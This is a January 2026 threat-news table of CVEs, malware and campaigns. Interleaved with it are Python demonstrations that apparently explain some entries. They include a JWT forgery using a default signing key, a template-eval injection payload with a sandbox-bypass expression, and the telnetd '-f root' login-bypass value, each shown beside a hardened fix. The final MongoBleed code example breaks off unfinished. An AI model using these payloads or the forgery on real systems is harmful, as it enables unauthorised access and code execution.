HOT NEWS 2026 JANUARY
| DATE | NAME | INFO | CATEGORY | SUBCATEGORY |
| 30.1.26 | LLM Jacking | LLM jacking is an attack technique that cybercriminals use to manipulate and exploit an enterprise’s cloud-based LLMs (large language models). LLM jacking involves stealing and selling cloud account credentials to enable malicious access to an enterprise’s LLMs while the victim unknowingly covers the consumption costs. | ATTACK | AI |
| 30.1.26 | CVE-2026-24423 | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. An attacker can point SmarterMail at a malicious HTTP server that serves an OS command, which the vulnerable application then executes. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2026-1340 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2026-1281 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40553 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40554 | SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40536 | SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40551 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40537 | SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials vulnerability that, under certain situations, could allow access to administrative functions. | VULNEREBILITY | VULNEREBILITY |
| 30.1.26 | CVE-2025-40552 | SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication. | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | CVE-2026-22709 | In vm2 for version 3.10.0, Promise.prototype.then and Promise.prototype.catch callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | CVE-2026-1470 | (CVSS score: 9.9) - An eval injection vulnerability that could allow an authenticated user to bypass the Expression sandbox mechanism and achieve full remote code execution on n8n's main node by passing specially crafted JavaScript code | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | CVE-2026-0863 | (CVSS score: 8.5) - An eval injection vulnerability that could allow an authenticated user to bypass n8n's python-task-executor sandbox restrictions and run arbitrary Python code on the underlying operating system | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | HoneyMyte | HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns | APT | APT |
| 28.1.26 | Python RAT | Malicious PyPI Packages spellcheckpy and spellcheckerpy Deliver Python RAT | MALWARE | PYTHON |
| 28.1.26 | CVE-2026-24858 | An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | TOAD Attack | When Zoom Phishes You: Unmasking a Novel TOAD Attack Hidden in Legitimate Infrastructure | ATTACK | ATTACK |
| 28.1.26 | Cellbreak | Cellbreak: Grist’s Pyodide Sandbox Escape and the Data-at-Risk Blast Radius | VULNEREBILITY | VULNEREBILITY |
| 28.1.26 | CVE-2026-24002 | Grist is spreadsheet software using Python as its formula language. Grist offers several methods for running those formulas in a sandbox, for cases where the user may be working with untrusted spreadsheets. One such method runs them in pyodide, but pyodide on node does not have a useful sandbox barrier. | VULNEREBILITY | VULNEREBILITY |
| 27.1.26 | PeckBirdy | PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups | MALWARE | FRAMEWORK |
| 27.1.26 | CVE-2026-21509 | Microsoft Office Security Feature Bypass Vulnerability | VULNEREBILITY | VULNEREBILITY |
| 27.1.26 | CVE-2025-69264 | pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature "Dependency lifecycle scripts execution disabled by default". | VULNEREBILITY | VULNEREBILITY |
| 27.1.26 | CVE-2025-69263 | pnpm is a package manager. Versions 10.26.2 and below store HTTP tarball dependencies (and git-hosted tarballs) in the lockfile without integrity hashes. | VULNEREBILITY | VULNEREBILITY |
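The pnpm lockfile entry above describes tarball and git dependencies stored without integrity hashes, which means the lockfile no longer pins the bytes that get installed. The following is an added example (not pnpm's own code) of a small audit that flags such entries. The lockfile snippet is constructed for the demo and follows the shape of pnpm-lock.yaml `packages:` entries as I understand them (`resolution: {integrity: ...}` for registry tarballs, `resolution: {tarball: ...}` for HTTP tarballs, `resolution: {type: git, ...}` for git-hosted dependencies); treat that layout as an assumption and confirm it against a real lockfile before relying on the parser.

```python
"""Audit a pnpm lockfile for dependencies recorded without an integrity hash.

Added example, not pnpm's own code. The lockfile text below is constructed and
its layout is an assumption about the pnpm-lock.yaml 'packages:' section.
"""
import re

SAMPLE_LOCKFILE = """\
lockfileVersion: '9.0'

packages:

  'lodash@4.17.21':
    resolution: {integrity: sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==}

  'left-pad@https://example.invalid/left-pad-1.3.0.tgz':
    resolution: {tarball: https://example.invalid/left-pad-1.3.0.tgz}

  'internal-tool@git+https://git.example.invalid/internal-tool.git#a1b2c3':
    resolution: {type: git, repo: https://git.example.invalid/internal-tool.git, commit: a1b2c3d4e5f60718293a4b5c6d7e8f9012345678}

  'pinned-tarball@https://example.invalid/pinned-1.0.0.tgz':
    resolution: {tarball: https://example.invalid/pinned-1.0.0.tgz, integrity: sha512-AAAA}
"""

PKG_RE = re.compile(r"^  '([^']+)':\s*$")           # package key line (2-space indent)
RES_RE = re.compile(r"^    resolution:\s*\{(.*)\}\s*$")  # inline resolution map


def parse_resolutions(lockfile_text):
    """Return {package_key: {resolution field: value}} from the packages: section."""
    resolutions = {}
    current = None
    in_packages = False
    for line in lockfile_text.splitlines():
        if line.startswith("packages:"):
            in_packages = True
            continue
        if not in_packages:
            continue
        m = PKG_RE.match(line)
        if m:
            current = m.group(1)
            resolutions[current] = {}
            continue
        m = RES_RE.match(line)
        if m and current is not None:
            for field in m.group(1).split(", "):
                key, _, value = field.partition(": ")
                resolutions[current][key] = value
    return resolutions


def find_unpinned(lockfile_text):
    """Keys of packages whose content is not bound by a hash.

    A git dependency pinned to a full 40-hex commit is accepted because the
    commit id binds the tree; anything else without 'integrity' is flagged.
    """
    flagged = []
    for key, res in parse_resolutions(lockfile_text).items():
        if "integrity" in res:
            continue
        commit = res.get("commit", "")
        if res.get("type") == "git" and re.fullmatch(r"[0-9a-f]{40}", commit):
            continue
        flagged.append(key)
    return flagged


if __name__ == "__main__":
    for key in find_unpinned(SAMPLE_LOCKFILE):
        print("no integrity hash:", key)
```

Run it against a checked-in lockfile in CI and fail the build on any flagged key; an HTTP tarball that is not pinned is exactly the dependency an attacker who controls (or MITMs) the hosting server can swap out silently.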
| 27.1.26 | SyncFuture Espionage Targeted Campaign | Weaponized in China, Deployed in India: The SyncFuture Espionage Targeted Campaign | CAMPAIGN | CAMPAIGN |
| 26.1.26 | KONNI | KONNI Adopts AI to Generate PowerShell Backdoors | MALWARE | POWERSHELL |
| 26.1.26 | AI-orchestrated cyber espionage campaign | We have developed sophisticated safety and security measures to prevent the misuse of our AI models. | CAMPAIGN | CAMPAIGN |
| 25.1.26 | HOUKEN | SEEKING A PATH BY LIVING ON THE EDGE WITH ZERO-DAYS | VULNEREBILITY | VULNEREBILITY |
| 25.1.26 | doxxing campaign | Shifts in the Underground: The Impact of Water Kurita’s (Lumma Stealer) Doxxing | CAMPAIGN | CAMPAIGN |
| 25.1.26 | GhostPoster Campaign | Browser Extensions Gone Rogue: The Full Scope of the GhostPoster Campaign | CAMPAIGN | CAMPAIGN |
| 25.1.26 | CVE-2023-27997 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 | VULNEREBILITY | VULNEREBILITY |
| 25.1.26 | CVE-2022-42475 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. | VULNEREBILITY | VULNEREBILITY |
| 25.1.26 | UAT-9686 | UAT-9686 actively targets Cisco Secure Email Gateway and Secure Email and Web Manager | GROUP | GROUP |
| 24.1.26 | DynoWiper | Sandworm behind cyberattack on Poland’s power grid in late 2025 | MALWARE | WIPER |
| 24.1.26 | CVE-2024-37079 | vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution. | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | CVE-2025-54313 | (CVSS score: 7.5) - An embedded malicious code vulnerability in eslint-config-prettier that could allow for execution of a malicious DLL dubbed Scavenger Loader that's designed to deliver an information stealer | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | CVE-2025-31125 | (CVSS score: 5.3) - An improper access control vulnerability in Vite Vitejs that could allow contents of arbitrary files to be returned to the browser using ?inline&import or ?raw?import (Fixed in March 2025 with versions 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11) | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | CVE-2025-34026 | (CVSS score: 9.2) - An authentication bypass in the Versa Concerto SD-WAN orchestration platform that could allow an attacker to access administrative endpoints (Fixed in April 2025 with version 12.2.1 GA) | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | CVE-2025-68645 | (CVSS score: 8.8) - A PHP remote file inclusion vulnerability in Synacor Zimbra Collaboration Suite (ZCS) that could allow a remote attacker to craft requests to the "/h/rest" endpoint and allow inclusion of arbitrary files from the WebRoot directory without any authentication (Fixed in November 2025 with version 10.1.13) | VULNEREBILITY | VULNEREBILITY |
| 24.1.26 | Operation DupeHike | Contents Introduction Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings. Looking into the decoy-document Technical Analysis Stage 1 – Malicious LNK Script Stage 2 – DUPERUNNER Implant Stage 3 – AdaptixC2 Beacon. Infrastructural Artefacts. Conclusion SEQRITE Protection.... | OPERATION | OPERATION |
| 24.1.26 | Operation Covert Access | Table of Contents: Introduction: Infection Chain: Targeted sectors: Initial Findings about Campaign: Analysis of Decoy: Technical Analysis: Stage-1: Analysis of Windows Shortcut file (.LNK). Stage-2: Analysis of Batch file. Stage-3: Details analysis of Covert RAT. Conclusion: Seqrite Coverage: IOCs... | OPERATION | OPERATION |
| 24.1.26 | Operation Nomad Leopard | Contents Introduction Key Targets Industries Affected Geographical focus Infection Chain. Initial Findings Looking into the decoy-document Technical Analysis Stage 1 – Malicious ISO File Stage 2 – Malicious LNK File Stage 3 – Final Payload: FALSECUB Infrastructure & Attribution... | OPERATION | OPERATION |
| 23.1.26 | The Skeleton Key | The Skeleton Key: How Attackers Weaponize Trusted RMM Tools for Backdoor Access | MALWARE | TOOL |
| 23.1.26 | CVE-2025-59719 | An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message. | VULNEREBILITY | VULNEREBILITY |
| 23.1.26 | CVE-2025-59718 | An improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 | VULNEREBILITY | VULNEREBILITY |
| 23.1.26 | Libheif uncompressed codec lacks bounds check leading to application crash | An out-of-bounds memory access vulnerability exists in the uncompressed decoder component of libheif. A maliciously crafted HEIF image can trigger a denial-of-service condition by causing the libheif library to crash or exhibit other unexpected behavior due to an out-of-bounds memory access. | ALERT | ALERT |
| 23.1.26 | Code injection vulnerability in binary-parser library | The binary-parser library for Node.js contains a code injection vulnerability that may allow arbitrary JavaScript code execution if untrusted input is used to construct parser definitions. Versions prior to 2.3.0 are affected. The issue has been resolved by the developer in a public update. | ALERT | ALERT |
| 23.1.26 | Open5GS WebUI uses a hard-coded secrets including JSON Web Token signing key | The Open5GS WebUI component contains default hardcoded secrets used for security-sensitive operations, including JSON Web Token (JWT) signing. If these defaults are not changed, an attacker can forge valid authentication tokens and gain administrative access to the WebUI. | ALERT | ALERT |
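The Open5GS entry above is the general case of a shipped, unrotated JWT signing key: anyone who reads the default from the public source can mint tokens the server accepts. The following added example (not Open5GS code) shows the forgery end to end with only the standard library, plus the start-up audit check a deployment should run. `DEFAULT_SECRET`, `DEPLOYED_SECRET` and `KNOWN_DEFAULTS` are placeholders for the demo, not the real shipped values.

```python
"""Forge and verify an HS256 JWT to show why a default signing key is fatal.

Added example, not Open5GS code. The secrets here are placeholders (assumed),
standing in for whatever shipped value an installation failed to change.
"""
import base64
import hashlib
import hmac
import json

DEFAULT_SECRET = b"change-me"      # assumed placeholder for a shipped default
DEPLOYED_SECRET = b"change-me"     # the operator never rotated it
KNOWN_DEFAULTS = [b"change-me", b"secret", b"default"]   # assumed audit list


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_jwt(payload, secret):
    """Mint header.payload.signature with HMAC-SHA256 over the signing input."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify_jwt(token, secret):
    """Return the payload if the HS256 signature checks out, else None."""
    try:
        header, body, sig = token.split(".")
    except ValueError:
        return None
    hdr = json.loads(b64url_decode(header))
    if hdr.get("alg") != "HS256":      # refuse alg confusion ('none', RS256 key swap)
        return None
    expected = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))


def attacker_forges_admin():
    """The attacker knows only the public default and mints an admin token."""
    return sign_jwt({"sub": "attacker", "roles": ["admin"]}, DEFAULT_SECRET)


def secret_is_default(secret):
    """Audit check: does the deployed key match any known shipped default?"""
    return any(hmac.compare_digest(secret, d) for d in KNOWN_DEFAULTS)


if __name__ == "__main__":
    token = attacker_forges_admin()
    print(verify_jwt(token, DEPLOYED_SECRET))   # accepted: the server trusts the forged admin
    print(secret_is_default(DEPLOYED_SECRET))   # True: the service should refuse to start
```

The verifier pins the algorithm before checking the MAC; a default key is the obvious failure here, but accepting whatever `alg` the token declares is the companion mistake that turns a key-handling bug into a no-key-at-all bug.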
| 23.1.26 | Stack-based buffer overflow in libtasn1 versions v4.20.0 and earlier | A stack-based buffer overflow vulnerability exists in GNU libtasn1, a low-level ASN.1 parsing library. | ALERT | ALERT |
| 23.1.26 | Safetica contains a kernel driver vulnerability | Kernel driver ProcessMonitorDriver.sys in Safetica's endpoint client x64, versions 10.5.75.0 and 11.11.4.0, allows for an unprivileged user to abuse an IOCTL path and terminate protected system processes. | ALERT | ALERT |
| 23.1.26 | Server-Side Template Injection (SSTI) vulnerability exist in Genshi | A Server-Side Template Injection (SSTI) vulnerability exists in the Genshi template engine due to unsafe evaluation of template expressions. Genshi processes template expressions using Python’s 'eval()’ and ‘exec()’ functions while allowing fallback access to Python built-in objects. If an attacker can influence template expressions, this behavior can result in arbitrary code execution on the server. | ALERT | ALERT |
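The Genshi entry above (and, in spirit, the n8n expression-sandbox CVEs listed on 28.1.26) comes down to evaluating attacker-influenced expressions with `eval()` while builtins stay reachable. The following added example (not Genshi's code) reproduces that pattern with a harmless payload, shows why merely stripping `__builtins__` is not a fix, and gives the hardening I would use instead: parse the expression and walk a whitelisted AST. It assumes Python 3.9 or newer and a constructed template context.

```python
"""Template-expression evaluation: eval() with builtins vs an AST whitelist.

Added example, not Genshi's code. 'render_unsafe' mimics the pattern the
advisory describes; 'render_safe' is one hardening (assumed, not Genshi's fix).
"""
import ast
import builtins
import operator

CONTEXT = {"user": "alice", "count": 3}   # constructed template context


def render_unsafe(expr, ctx):
    """Vulnerable: builtins are reachable, so __import__ is one expression away."""
    namespace = dict(ctx)
    namespace.setdefault("__builtins__", builtins)
    return eval(expr, namespace)


def render_builtins_stripped(expr, ctx):
    """Still not safe: dropping __builtins__ does not block object-graph walks."""
    return eval(expr, {"__builtins__": {}}, dict(ctx))


_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Mod: operator.mod}


def _eval_node(node, ctx):
    """Allow literals, context names, basic arithmetic and subscripts; nothing else."""
    if isinstance(node, ast.Constant):
        return node.value
    if isinstance(node, ast.Name):
        if node.id not in ctx:
            raise ValueError(f"unknown name {node.id!r}")
        return ctx[node.id]
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_eval_node(node.left, ctx), _eval_node(node.right, ctx))
    if isinstance(node, ast.Subscript):
        return _eval_node(node.value, ctx)[_eval_node(node.slice, ctx)]
    # Attribute, Call, Lambda, comprehensions and the rest are rejected outright.
    raise ValueError(f"disallowed expression node {type(node).__name__}")


def render_safe(expr, ctx):
    """Hardened: whitelist-based evaluation of a parsed expression tree."""
    return _eval_node(ast.parse(expr, mode="eval").body, ctx)


# Constructed attacker expressions. The payload is benign so the demo is
# harmless, but the same path runs __import__('os').system(...).
PAYLOAD = "__import__('os').getpid()"
# Classic escape once builtins are stripped: walk from a literal to object's subclasses.
BYPASS = "().__class__.__base__.__subclasses__()"


def demo():
    results = {}
    results["unsafe_executes_import"] = isinstance(render_unsafe(PAYLOAD, CONTEXT), int)
    results["stripped_builtins_bypassed"] = len(render_builtins_stripped(BYPASS, CONTEXT)) > 0
    try:
        render_safe(PAYLOAD, CONTEXT)
        results["safe_blocks_payload"] = False
    except ValueError:
        results["safe_blocks_payload"] = True
    results["safe_still_renders"] = render_safe("count * 2 + 1", CONTEXT)
    return results


if __name__ == "__main__":
    print(demo())
```

The whitelist is deliberately small; every node type you add (attribute access in particular) is a new route back to the object graph, so extend it only with named, audited helpers rather than general Python semantics.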
| 23.1.26 | dr_flac contains an integer overflow vulnerability that allows for DoS when provided a crafted file | dr_flac, an open-source FLAC audio decoder that is part of the dr_libs audio decoder toolset, contains an integer overflow vulnerability that allows denial of service (DoS) when a specially crafted file is decoded. An attacker can exploit it by supplying such a file to any tool that uses dr_flac, causing the tool to crash. | ALERT | ALERT |
| 23.1.26 | Ransomware 2026 | New Actors and Threats Emerge as the Threat Landscape Evolves | PAPERS | PAPERS |
| 23.1.26 | Osiris Ransomware | Osiris Ransomware: New Addition to the Locky Family | RANSOMWARE | RANSOMWARE |
| 23.1.26 | CVE-2026-24061 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable. | VULNEREBILITY | VULNEREBILITY |
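The telnetd entry above is a textbook argument injection: a client-supplied user name that begins with `-` is handed to `login`, which parses it as an option, and `login -f root` means "root is already authenticated". The following added example (not inetutils code) models the mechanism and the fix in Python. It assumes the login command is built from a template such as `login -p -h %h %u` and then word-split, which is how a value like `-f root` becomes two argv elements; real telnetd builds may differ.

```python
"""Argument injection through a login-invocation template: the '-f root' pattern.

Added example, not inetutils code. LOGIN_TEMPLATE and the option set handled by
login_would_force_auth are assumptions made for the demo.
"""
import re
import shlex

LOGIN_TEMPLATE = "login -p -h %h %u"          # assumed template shape
USERNAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9._-]{0,31}$")   # no leading '-'


def build_argv_template(template, host, user):
    """Vulnerable: substitute into a string, then split the string into argv."""
    return shlex.split(template.replace("%h", host).replace("%u", user))


def build_argv_safe(host, user):
    """Hardened: validate the name, build argv as a list, end options with '--'."""
    if not USERNAME_RE.match(user):
        raise ValueError(f"refusing suspicious user name {user!r}")
    return ["login", "-p", "-h", host, "--", user]


def login_would_force_auth(argv):
    """Mimic login's option scan far enough to see whether '-f' lands as an option.

    '-h' and '-f' are treated as options that consume the next argument; '--'
    ends option parsing (standard getopt behaviour, assumed for login here).
    """
    opts = []
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "--":
            break
        if arg.startswith("-"):
            opts.append(arg)
            if arg in ("-h", "-f"):
                i += 1
        i += 1
    return "-f" in opts


if __name__ == "__main__":
    evil = "-f root"                       # value of the USER environment variable
    argv = build_argv_template(LOGIN_TEMPLATE, "10.0.0.5", evil)
    print(argv)                            # ['login', '-p', '-h', '10.0.0.5', '-f', 'root']
    print(login_would_force_auth(argv))    # True: login skips the password prompt
    try:
        build_argv_safe("10.0.0.5", evil)
    except ValueError as e:
        print(e)
```

Two independent fixes are shown because each alone is brittle: the regex rejects option-looking names, and `--` stops `login` from treating anything after it as an option even if validation is later loosened.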
| 22.1.26 | Fortinet FortiGate Devices via SSO Accounts | Arctic Wolf has observed a new cluster of automated malicious activity involving unauthorized firewall configuration changes on FortiGate devices. | CAMPAIGN | CAMPAIGN |
| 22.1.26 | CVE-2026-20045 | A vulnerability in Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & | VULNEREBILITY | VULNEREBILITY |
| 22.1.26 | PurpleBravo | PurpleBravo’s Targeting of the IT Software Supply Chain | GROUP | GROUP |
| 22.1.26 | CVE-2026-22844 | A Command Injection vulnerability in Zoom Node Multimedia Routers (MMRs) before version 5.2.1716.0 may allow a meeting participant to conduct remote code execution of the MMR via network access. | VULNEREBILITY | VULNEREBILITY |
| 21.1.26 | ChainLeak | ChainLeak: Critical AI framework vulnerabilities expose data, enable cloud takeover | VULNEREBILITY | AI |
| 21.1.26 | VoidLink | VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun | MALWARE | AI |
| 21.1.26 | Campaign Targeting LastPass Customers | New Phishing Campaign Targeting LastPass Customers | CAMPAIGN | PHISHING |
| 21.1.26 | CVE-2026-1245 | A code injection vulnerability in the binary-parser library prior to version 2.3.0 allows arbitrary JavaScript code execution when untrusted values are used in parser field names or encoding parameters. | VULNEREBILITY | VULNEREBILITY |
| 21.1.26 | Contagious Interview campaign | Threat Actors Expand Abuse of Microsoft Visual Studio Code | CAMPAIGN | CAMPAIGN |
| 21.1.26 | Spread rat | Open-Source Python Script Drives Social Media Phishing Campaign | MALWARE | PYTHON |
| 20.1.26 | Semantic Attack | Weaponizing Calendar Invites: A Semantic Attack on Google Gemini | ATTACK | AI |
| 20.1.26 | Evelyn | From Extension to Infection: An In-Depth Analysis of the Evelyn Stealer Campaign Targeting Software Developers | MALWARE | Stealer |
| 19.1.26 | ModeloRAT | Dissecting CrashFix: KongTuke's New Toy | MALWARE | RAT |
| 19.1.26 | StealC | UNO reverse card: stealing cookies from cookie stealers | MALWARE | Stealer |
| 19.1.26 | StackWarp: Breaking AMD SEV-SNP Integrity via Deterministic Stack-Pointer Manipulation through the CPU’s Stack Engine | Confidential Virtual Machines (CVMs), such as AMD SEV-SNP, aim to protect guest operating systems from an untrusted host by encrypting state and constraining privileged control. These platforms promise isolation even in multi-tenant cloud setups where simultaneous multithreading (SMT) remains enabled. | PAPERS | PAPERS |
| 19.1.26 | CVE-2025-29943 | Improper access control within AMD CPUs may allow an admin-privileged attacker to modify the configuration of the CPU pipeline, potentially resulting in the corruption of the stack pointer inside an SEV-SNP guest. | VULNEREBILITY | VULNEREBILITY |
| 18.1.26 | WhisperPair | Hijacking Bluetooth Accessories Using Google Fast Pair | HACKING | Bluetooth |
| 18.1.26 | CVE-2025-6965 | There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. We recommend upgrading to version 3.50.2 or above. | VULNEREBILITY | VULNEREBILITY |
| 18.1.26 | CVE-2025-36911 | In key-based pairing, there is a possible information disclosure (ID) due to a logic error in the code. This could lead to remote (proximal/adjacent) disclosure of the user's conversations and location with no additional execution privileges needed. User interaction is not needed for exploitation. | VULNEREBILITY | VULNEREBILITY |
| 18.1.26 | thelibrarian does not secure its interface, allowing for access to internal system data | Multiple vulnerabilities were discovered in The Librarian, an AI-powered personal assistant tool provided by the company TheLibrarian.io. The Librarian can be used to manage personal email, calendar, documents, and other information through external services, such as Gmail and Google Drive, and also summarize meetings and schedule emails. | ALERT | ALERT |
| 18.1.26 | Livewire Filemanager contains an insecure .php component that allows for unauthenticated RCE in Laravel Products | A vulnerability, tracked as CVE-2025-14894, has been discovered within Livewire Filemanager, a tool designed for usage within Laravel applications. The Livewire Filemanager tool allows for users to upload various files, including PHP files, and host them within the Laravel application. | ALERT | ALERT |
| 17.1.26 | Sicarii Ransomware | Sicarii is a novel Ransomware-as-a-Service (RaaS) operation first discovered last year. The deployed ransomware variant is capable of file encryption, data exfiltration, credential harvesting, and network reconnaissance. | ALERTS | RANSOM |
| 17.1.26 | LotusLite backdoor delivery campaign | The Acronis Threat Research Unit has detected a targeted malware campaign aimed at U.S. governmental entities. The campaign utilizes politically themed malspam with .ZIP attachments to deliver a custom C++ backdoor dubbed LotusLite. | ALERTS | CAMPAIGN |
| 17.1.26 | Multi-stage ShadowReactor Campaign Delivers Remcos through Text-based Components | Remcos is a frequently seen Remote Access Trojan (RAT) payload. Researchers at Securonix shared details of a recently observed campaign, identified as Shadow#Reactor. In this multi-stage campaign, text-based files like VBS, PowerShell scripts, and encoded text are responsible for delivering the final Remcos payload. | ALERTS | CAMPAIGN |
| 17.1.26 | deVixor Android malware | deVixor is a new Android banking malware variant observed to target Iranian users in recent campaigns. As reported by researchers from Cyble, the attackers spread this malware by distributing malicious APK files via phishing websites that mimic legitimate automotive businesses. | ALERTS | VIRUS |
| 17.1.26 | VVS Discord Stealer | VVS Stealer is a sophisticated Python-based malware used to target Discord users and exfiltrate sensitive information. As reported by the researchers from Palo Alto Unit42, once deployed the infostealer searches for encrypted Discord tokens within LevelDB directory and harvests extensive account data, including credentials, billing information, and multifactor authentication (MFA) status. | ALERTS | VIRUS |
| 17.1.26 | IT3 Tax-Themed HTML Phishing Targets South African Enterprise Users | A phishing campaign targeting South African organizations is abusing SARS/IT3 tax certificates as a social-engineering lure. The email uses a subject styled like an internal reference string and delivers a malicious HTML attachment masquerading as a spreadsheet/tax document (e.g., Discovery TAX IT3(B)(C) _ <victim email address> xslx.htm). | ALERTS | PHISHING |
| 17.1.26 | GalleryEye Spyware Masquerades as “Free Saudi Numbers” App | We identified an Android campaign targeting Saudi mobile users with a trojanized application masquerading as a “Free Saudi Numbers” utility, but the underlying threat is GalleryEye hosted on MediaFire. The lure is designed to attract users looking for “أرقام سعودية مجاناً” (free Saudi numbers), a highly effective theme because it aligns with common needs such as account verification, messaging registration, and “virtual number” services. | ALERTS | VIRUS |
| 17.1.26 | CVE-2025-14847 - MongoBleed vulnerability exploited in the wild | CVE-2025-14847 is a recently disclosed high severity (CVSS score 8.7) Improper Handling of Length Parameter Inconsistency vulnerability affecting MongoDB and MongoDB Server in versions from 3.6 onward. | ALERTS | VULNEREBILITY |
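"Improper Handling of Length Parameter Inconsistency" in the MongoBleed entry above is the class of bug where a message declares one length and carries another, and the parser trusts the declaration. The following added example (not MongoDB code) models it with a simplified compressed frame: a declared uncompressed length followed by a zlib stream, with the "heap" simulated as a buffer that still holds bytes from an earlier request. The framing is an assumption loosely modelled on a wire-protocol compressed message, not the actual MongoDB format.

```python
"""Length-parameter inconsistency in a compressed message frame (MongoBleed-style).

Added example, not MongoDB code. The frame layout (int32 declared length +
zlib stream) and the stale-heap simulation are constructed for the demo.
"""
import struct
import zlib


def build_frame(payload, declared_len=None):
    """Attacker side: declared_len may lie about the decompressed size."""
    if declared_len is None:
        declared_len = len(payload)
    return struct.pack("<i", declared_len) + zlib.compress(payload)


class StaleHeap:
    """Simulates a reused allocation: a decompress buffer that keeps old contents."""
    def __init__(self, previous_contents):
        self.buf = bytearray(previous_contents)

    def allocate(self, n):
        # Like malloc without a memset: grow if needed, never wipe old bytes.
        if len(self.buf) < n:
            self.buf.extend(b"\x00" * (n - len(self.buf)))
        return self.buf


def parse_vulnerable(frame, heap):
    """Trusts the declared length: copies decompressed data in, returns declared_len bytes."""
    declared_len = struct.unpack("<i", frame[:4])[0]
    out = heap.allocate(declared_len)
    data = zlib.decompress(frame[4:])
    out[:len(data)] = data
    return bytes(out[:declared_len])     # the tail past len(data) is stale memory


def parse_fixed(frame, heap, max_len=48 * 1024 * 1024):
    """Checks that declared and actual lengths agree before exposing any bytes."""
    declared_len = struct.unpack("<i", frame[:4])[0]
    if declared_len < 0 or declared_len > max_len:
        raise ValueError("declared length out of range")
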